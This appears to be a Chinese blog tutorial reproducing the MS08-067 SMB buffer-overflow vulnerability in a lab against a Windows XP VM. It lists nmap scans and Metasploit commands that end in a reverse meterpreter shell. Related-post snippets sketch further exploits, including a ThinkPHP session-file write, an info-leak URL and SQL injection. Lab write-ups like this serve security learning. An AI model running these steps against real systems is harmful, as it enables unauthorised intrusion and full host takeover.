MS08_067漏洞复现

最新推荐文章于 2023-03-25 16:32:39 发布
最新推荐文章于 2023-03-25 16:32:39 发布
阅读量2k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_45291045/article/details/116834151
本文详细介绍了如何利用MS08_067漏洞攻击Windows XP系统的过程,包括环境准备、端口扫描、漏洞检测和复现。通过nmap工具探测目标主机的445端口,确认存在漏洞后,使用Metasploit框架选择相应的攻击模块,配置参数并执行,最终实现远程代码执行,获取对靶机的控制权。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

原理

攻击者利用受害主机默认开放的SMB服务端口445,发送恶意资料到该端口,通过MSRPC接口调用server服务的一个函数,并破坏程序的栈缓冲区,获取远程代码执行的权限,从而完全控制主机

环境准备

攻击机kali 192.168.182.130
靶机 windows xp 中文版 192.168.182.129

靶机关闭防火墙,靶机需要在攻击机的网段中

端口扫描

使用nmap探测ip网段上存活的主机及开放的端口

nmap -sV -n 192.168.182.0/24
  • -sV表示扫描系统版本及服务信息
  • -n 表示加快扫描进度

在这里插入图片描述
查看是否存在ms08_067漏洞

nmap -n -p 445 --script smb-vuln-ms08-067 192.168.182.129 --open

在这里插入图片描述

漏洞复现

启动msfconsole

msfconsole

在这里插入图片描述
搜索ms08_067选择攻击模块

search ms08_067

在这里插入图片描述
use调用模块

use exploit/windows/smb/ms08_067_netapi

show options 查看该模块需要配置的参数

show options

yes表示需要配置的参数,RPORT,SMBPIPE已经默认配置好了,只需要配置RHOSTS
在这里插入图片描述配置RHOSTS,设置为靶机地址

set RHOSTS 192.168.182.129

msf6 Payload 攻击载荷模块已经默认设置好了不需要再设置lhost,LHOST表示回连地址,LPORT端口
在这里插入图片描述
设置target,靶机的系统版本

show targets

我的靶机是xp sp3 中文版
在这里插入图片描述设置为target34 windows xp3 中文版

set target 34

在这里插入图片描述
run 运行即可反弹shell,反弹一个meterpreter代表攻击成功

run

在这里插入图片描述

使用kali下的msf对windows 2003进行测试
Amdy_amdy的博客
07-02 2742
使用kali下的msf对windows 2003进行测试 测试环境: windows 2003 192.168.145.132 kali: 192.168.145.146 使用kali查看windows2003下开放的端口以及对应端口是否存在漏洞: nmap --script=vuln 192.168.145.132 root@kali:~# nmap --script=vuln ...
MS08_067漏洞复现与总结
马赛克的博客
02-28 6972
00x00 原理:攻击者利用受害主机默认开放的SMB服务端口445,发送恶意资料到该端口,通过MSRPC接口调用server服务的一个函数,并破坏程序的栈缓冲区,获取远程代码执行的权限,从而完全控制主机 安全补丁:KB958644 00x01 #准备工作 两台虚拟机,一台为kali ip:10.10.10.131 一台为Windowsxpsp3英文版 ip:10.10.1...
ms08-067漏洞靶机配置
weixin_46137328的博客
04-09 1556
ms08-067这个漏洞是我们在学习msf的时候一个最基础的漏洞,很多教程都会提及,但是这个漏洞复现环境很挑剔,导致很多人复现不成功。这两天又在看这个漏洞,所以把漏洞环境配置发出来。...
ms08-067漏洞复现
老司机开代码的博客
09-09 5824
文章目录ms08-067简介复现实验环境漏洞利用 ms08-067简介 Windows Server服务RPC请求缓冲区溢出漏洞MS08-067)。 漏洞类别:远程溢出 CVE-ID : 2008-4250 漏洞详情: MicrosoftWindows是美国微软(Microsoft)公司发布的一系列操作系统。Windows的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞。远程攻击者可以通过发送恶意的RPC请求触发这个溢出,导致完全入侵用户系统,以SYSTEM权限执行任意指令。对于Windo
SMB渗透测试常规思路
redwand的博客
02-08 8024
在互联网上,几乎所有的windows主机都开启了文件共享功能,这个功能是通过smb协议来实现的,因此,作为渗透测试工程师对于smb协议的理解必须要全面且深刻。
Windows漏洞MS08-067远程代码执行漏洞复现及深度防御
华为云官方博客
11-16 9559
摘要:详细讲解MS08-067远程代码执行漏洞(CVE-2008-4250)及防御过程
ms08_067漏洞复现
m0_63711447的博客
09-11 1631
漏洞原理:MS08_067漏洞也是在445端口上被攻击者利用,MS17_010利用的是445端口上的网络共享和远程文件的服务,而这次的MS08_067利用的是在远程调用过程中,函数出现的逻辑性错误,从而造成缓冲区溢出。
ms08_067ms10_046漏洞复现与利用
kunkun_xiaomeng的博客
09-07 1600
ms08_067ms10_046
Windows XP SP2 (Simplified Chinese MS08_067漏洞复现)
qq_43093288的博客
03-25 2261
MS08-067漏洞全称是“Windows Server服务RPC请求缓冲区溢出漏洞”,Windows的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞。注:发现Windows XP SP2 (Simplified Chinese)存在多个漏洞:ms17-010,ms08-067,,但是我们现在只考虑ms08-067。注:发现Windows XP SP2 (Simplified Chinese)的IP:172.16.12.101。
ms08_067漏洞复现原理
最新发布
12-30
### CVE-2008-4250 (MS08-067) 漏洞工作原理 #### 背景介绍 CVE-2008-4250,也称为 MS...use exploit/windows/smb/ms08_067_netapi set RHOSTS <target_ip> set PAYLOAD windows/meterpreter/reverse_tcp exploit ```
Kali之MSF的MS08-067漏洞复现详解
weixin_47899104的博客
12-05 7842
MSF即Metasploit Framework,是一个综合性的渗透测试工具,集成信息收集、漏洞扫描、漏洞利用以及提权等功能的工具。 目前安装的kali都自带MSF,可以直接在图形界面打开 也可以在kali的终端通过使用命令msfconsole来打开。 ┌──(kali㉿kali)-[~] └─$ ls /usr/share/metasploit-framework/ 或者2022版kali以后(在这之前的版本不知道可不可行)的直接桌面按如下步骤找到msf安装目录。 ①auxiliary模块:主要包含渗透测
MS08-067漏洞复现实验
0day
06-18 1625
MS08-067漏洞复现实验 实现环境准备: 攻击机:kali(IP:192.168.153.129) 目标靶机:Windows XP(IP:192.168.153.128) 攻击工具:metasploit-framework,nmap 实验步骤 第一步:使用nmap扫描目标靶机,判断其是否存在ms08-067漏洞 nmap -n -p 445 --script smb-vuln-ms08-067 192.168.153.128 --open 扫描发现该目标靶机存在该漏洞,具备实验条件 第二步:打开met
weblogic未授权命令执行漏洞(CVE-2020-14882)复现
weixin_45291045的博客
04-01 5197
文章目录漏洞概述漏洞影响范围环境搭建漏洞复现利用工具 漏洞概述 未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的 WebLogic Server 上执行任意代码。 漏洞影响范围 Oracle Weblogic Server 10.3.6.0.0 Oracle Weblogic Server 12.1.3.0.0 Oracle Weblogic Server 12.2.1.3.0 Oracle Weblogic Server 12.2.1.4.0 Oracle Webl
锐捷RG-UAC同一上网行为管理(信息泄露漏洞复现)
weixin_45291045的博客
03-13 1865
构造url https://xxx.xxx.cn/get_dkey.php?user=admin 可看到该系统的超级管理员权限账号、访客权限账号 md5解密密码后即可登录
Thinkphp < 6.0.2 session id未作过滤漏洞导致的任意写文件
weixin_45291045的博客
03-09 735
漏洞描述 2020年1月10日,ThinkPHP团队发布一个补丁更新,修复了一处由不安全的SessionId导致的任意文件操作漏洞.该漏洞允许攻击者在目标环境启用session的条件下创建任意文件以及删除任意文件,在特定情况下还可以getshell. 影响范围 ThinkPHP6.0.0-6.0.1 漏洞复现 这是一个ThinkPHP任意文件写入靶场 首先抓取数据包 构造数据包 /tp6/public/index.php?c=aaa<?php+phpinfo();+?> PHPSESSID长
Django debug page XSS漏洞复现
weixin_45291045的博客
04-04 695
文章目录漏洞描述影响产品漏洞复现 漏洞描述 Django是Django软件基金会的一套基于Python语言的开源Web应用框架。该框架包括面向对象的映射器、视图系统、模板系统等。Django1.10.8之前的版本和1.11.5之前的1.11.x版本中的Technical500Template存在安全漏洞,该漏洞源于程序没有正确的过滤用户提交的输入。远程攻击者可利用该漏洞在浏览器中执行任意脚本代码。 影响产品 Djangoproject Django 1.11.4 Djangoproject Django 1
通达OA 11.5 sql注入漏洞复现
weixin_45291045的博客
02-13 670
下载地址:https://cdndown.tongda2000.com/oa/2019/TDOA11.5.exe 1.登录一个账户 2.构造url http://192.168.1.1general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2,burp抓包 id参数存在延时注入 直接复制数据包,id参数加个*保存到sqlmap跑 python sqlmap.py -r 1.txt orderby参数 构
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值